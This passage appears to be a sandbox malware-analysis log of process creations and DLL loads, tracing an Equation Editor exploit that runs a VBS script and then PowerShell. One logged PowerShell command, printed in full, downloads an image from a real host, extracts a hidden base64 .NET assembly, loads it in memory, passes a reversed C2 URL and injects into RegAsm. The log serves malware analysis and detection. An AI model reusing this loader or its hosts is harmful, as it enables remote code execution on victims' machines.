            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\lionarekingofjungleimageshes.vbs" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.GBR/0808/651.771.64.891//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))} }"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exeJump to behavior
            Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\rugtucw C:\Users\user\AppData\Roaming\rugtucwJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwSection loaded: wow64win.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\rugtucwSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
            Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
            Source: C:\Windows\explorer.exeSection loaded: webio.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
